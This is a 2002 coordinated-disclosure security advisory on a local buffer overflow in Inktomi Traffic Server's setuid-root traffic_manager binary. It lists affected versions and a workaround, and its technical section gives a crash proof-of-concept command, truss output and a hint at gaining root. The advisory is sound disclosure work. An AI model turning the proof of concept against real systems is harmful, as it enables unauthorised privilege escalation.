Vulnerability Report For Inktomi Traffic Server

Advisory ID Internal
CORE-220620

Bugtraq ID: 5098

CVE Name: CVE-2002-1013

Title: Inktomi Traffic Server traffic_manager local overflow.

Class: Boundary error condition (buffer overflow)

Remotely Exploitable: NO

Locally Exploitable: Yes

Vendors contacted:
Inktomi Corporation (INKT)
. Inital email sent: 2002-06-21
. Acknowledged reception of initial contact: 2002-06-24
. Official response and fix information: 2002-07-01

Release mode: COORDINATED RELEASE


Vulnerability Description

Inktomi's Traffic Server product provides transparent web caching, access control and content filtering. It is available for Linux, Solaris and Windows platforms. A vulnerability that could allow a local attacker to gain root access has been discovered in the unix version of the software.


Problem: Buffer overflow in traffic_manager executable

The traffic_manager executable is used to manage Traffic Server, it is installed setuid-root by default under the [installpath]/bin directory.
When traffic_manager is executed with a long command line argument, a buffer overflow occurs.
This vulnerability can be exploited locally to gain root access.

A local exploit module is available for CORE IMPACT customers in the July 2002 update pack.


Vulnerable Packages/Systems

The local root vulnerability in traffic_manager exists in all current and previous revisions of Inktomi Traffic Server, Traffic Edge and Media-IXT.

Current product revisions are:
Media-IXT 3.0.4
Traffic Server / Media-IXT 4.0.18
Traffic Server / Media-IXT 4.0.20
Traffic Server / Media-IXT 5.1.3
Traffic Server / Media-IXT 5.2.0-R
Traffic Server / Media-IXT 5.2.1
Traffic Server / Media-IXT 5.2.2
Traffic Edge 1.1.2 (Traffic Server 5.2.1)
Traffic Edge 1.5.0 (Traffic Server 5.5)


Solution/Vendor Information/Workaround

The buffer overflow error in the "-path" option of the traffic_manager command will be corrected to remove the vulnerability in all future maintenance releases of Traffic Server, Media-IXT and Traffic Edge.

The identified vulnerability applies to command-line execution of bin/traffic_manager, so the risk applies only to shell sessions already connected to the proxy host as non-privileged users. The vulnerability does not affect network services or access and cannot grant remote access to the proxy host.

If you wish to block this local vulnerability, remove the setuid bit from the traffic_manager executable. When traffic_manager is not setuid root, the proxy will not be able to directly serve 'privileged' port numbers less than 1024.

Some proxy configurations will require ARM config/ipnat.conf

Please refer to Inktomi's note on the bug at http://support.inktomi.com/kb/070202-003.html with specific instructions on how to reconfigure the products to operate properly without the SUID flag set on the binary.

Contact [email protected] for assistance


Credits

This vulnerability was discovered by the Security Consulting Services team at Core Security.

We would like to thank Warren Brown from Inktomi Product Support for the quick response to the issue.


Technical Description - Exploit/Concept Code

Traffic Manager installs the traffic_manager program as a root owned file with the set user id bit set.

Below are the lines from install.sh that makes traffic_manager setuid-root.

----
# Adjust setuid commands
chown root ${InstallDir}/bin/traffic_manager >>$LogFile 2>&1
chmod 4755 ${InstallDir}/bin/traffic_manager >>$LogFile 2>&1
if [ -d ${InstallDir}/bin/debug ] ; then
chown root ${InstallDir}/bin/debug/traffic_manager >>$LogFile 2>&1
chmod 4755 ${InstallDir}/bin/debug/traffic_manager >>$LogFile 2>&1
fi

----
The overflow occurs when a string longer than 1700 bytes is passed as argument to the -path option. The exploitability has been confirmed under Solaris platform.

/inktomi/5.1.3/bin# ./traffic_manager -path `perl -e 'print "A"x1720'` <
[TrafficManager] ==> Kernel Sig 11; Reason: 1
[TrafficManager] ==> Cleaning up and reissuing signal #11
Abort(coredump)

truss output:
open64("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAA", O_RDONLY) Err#78 ENAMETOOLONG
fstat(3, 0xFFBEC130) = 0
time() = 1024660377
getpid() = 27458 [27457]
putmsg(3, 0xFFBEB7E8, 0xFFBEB7DC, 0) = 0
open("/var/run/syslog_door", O_RDONLY) Err#2 ENOENT
Incurred fault #5, FLTACCESS %pc = 0xFF0CF2E0
siginfo: SIGBUS BUS_ADRALN addr=0x41414149
Received signal #10, SIGBUS [caught]
siginfo: SIGBUS BUS_ADRALN addr=0x41414149

Replacing 0x41414141 for a valid stack address and building the right string it is posible to execute arbitrary code with root privileges.


DISCLAIMER:

The contents of this advisory are copyright (c) 2002 CORE SECURITY TECHNOLOGIES
and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.

$Id: InktomiTS-pathbof-advisory.txt,v 1.5 2002/07/02 21:11:40 iarce Exp $